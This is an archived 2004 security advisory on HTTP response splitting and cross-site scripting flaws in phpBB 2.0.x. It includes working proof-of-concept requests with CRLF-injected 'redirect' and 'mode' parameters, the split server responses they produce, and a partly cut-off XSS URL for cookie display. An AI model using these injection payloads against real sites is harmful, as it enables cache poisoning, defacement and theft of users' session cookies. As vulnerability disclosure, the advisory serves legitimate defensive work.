TUCoPS :: Web BBS :: Frequently Exploited

TUCoPS :: Web BBS :: Frequently Exploited :: hack1253.htm
PhpBB HTTP Response Splitting & Cross Site Scripting vulnerabilities

PhpBB HTTP Response Splitting & Cross Site Scripting vulnerabilities ///////////////////////////////////////////////////////////////////// //===================>> Security Advisory <<=======================// ///////////////////////////////////////////////////////////////////// --------------------------------------------------------------------- ---[ PhpBB HTTP Response Splitting & Cross Site Scripting vuln. --------------------------------------------------------------------- --[ Author: Ory Segal , Sanctum inc. http://www.SanctumInc.com --[ Discovery Date: 14/7/2004 --[ Release Date: 18/7/2004 --[ Product: PhpBB 2.0.x (was tested on 2.0.4, 2.0.9) --[ Severity: High --[ HTTP Response Splitting details Two scripts are vulnerable to HTTP Response Splitting attacks: - /phpBB2/privmsg.php ('mode' parameter) - /phpBB2/login.php ('redirect' parameter) These vulnerabilities may allow an attacker to perform various attacks such as web cache poisoning, cross user defacement, hijacking pages with sensitive user information and perform cross-site scripting attacks. --[ Cross Site Scripting details When gpc magic quotes are turned off in php.ini, the script '/phpBB2/search.php' is vulnerable to XSS in the 'search_author' parameter. This vulnerability may lead to theft of cookies associated with the domain, or execution of client-side scripts in the user's browser. --[ Additional information Detailed information on HTTP Response Splitting can be found in the white paper "HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" (Written by Amit Klein of Sanctum inc.) http://www.sanctuminc.com/pdf/WhitePaper_HTTPResponse.pdf Note [1]: The HTTP Response Splitting vulnerabilities do not require the user to be logged in to the application. Note [2]: These vulnerabilities were discovered on PhpBB 2.0.9, installed on Win2K server with IIS/5.0, and PHP/4.3.4 (was also validated on PHP/4.3.8) Note [3]: In theory these HTTP Response Splitting vulnerabilities should work on Microsoft web servers, WebSTAR and Xitami. --[ Exploit Requests / URLs -[ XSS Example The following request will present a pop-up window containing the current session's cookies: (REQUEST IS WORD-WRAPPED!) http://SERVER/phpBB2/search.php?search_author=' -[ HTTP Response Splitting Example [1] The following request will cause the application to return a split response (REQUEST and RESPONSE ARE WORD-WRAPPED!) [REQUEST] POST /phpBB2/login.php HTTP/1.0 Host: SERVER User-Agent: Mozilla/4.7 [en] (WinNT; I) Accept-Encoding: gzip Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 Content-Type: application/x-www-form-urlencoded Content-length: 129 logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha! [RESPONSE] HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 14 Jul 2004 09:48:04 GMT Content-type: text/html X-Powered-By: PHP/4.3.4 Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Thu, 14-Jul-2005 09:48:04 GMT; path=/ Set-Cookie: phpbb2mysql_sid=b389d63f8226cc6c8ad349b3aadf41f3; path=/ Refresh: 0; URL=http://SERVER/phpBB2foobar Content-Length: 0 HTTP/1.0 200 OK Content-Length: 7 Gotcha! ... ... ... -[ HTTP Response Splitting Example [2] The following request will cause the application to return a split response (REQUEST and RESPONSE ARE WORD-WRAPPED!) [REQUEST] GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d %0aHTTP/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha! HTTP/1.0 Proxy-Connection: Keep-Alive User-Agent: Mozilla/4.7 [en] (WinNT; I) Host: SERVER [RESPONSE] HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Wed, 14 Jul 2004 12:42:17 GMT Content-type: text/html X-Powered-By: PHP/4.3.4 Set-Cookie: phpbb2mysql_data=a%3A0%3A%7B%7D; expires=Thu, 14-Jul-2005 12:42:17 GMT; path=/ Set-Cookie: phpbb2mysql_sid=74d20cacbfcd9d7b16e0bb86a345aea3; path=/ Refresh: 0; URL=http://SERVER/phpBB2login.php?redirect=privmsg .php&folder=inbox&mode=foobar Content-Length: 0 HTTP/1.0 200 OK Content-Length: 7 Gotcha!&sid=74d20cacbfcd9d7b16e0bb86a345aea3 ... ... ... --[ Solution According to the vendor, these issues are addressed in PhpBB 2.0.10 --[ Acknowledgements Amit Klein, for helping with the research of the HTTP Response Splitting vulnerabilities in PhpBB (and for discovering HTTP Response Splitting in the first place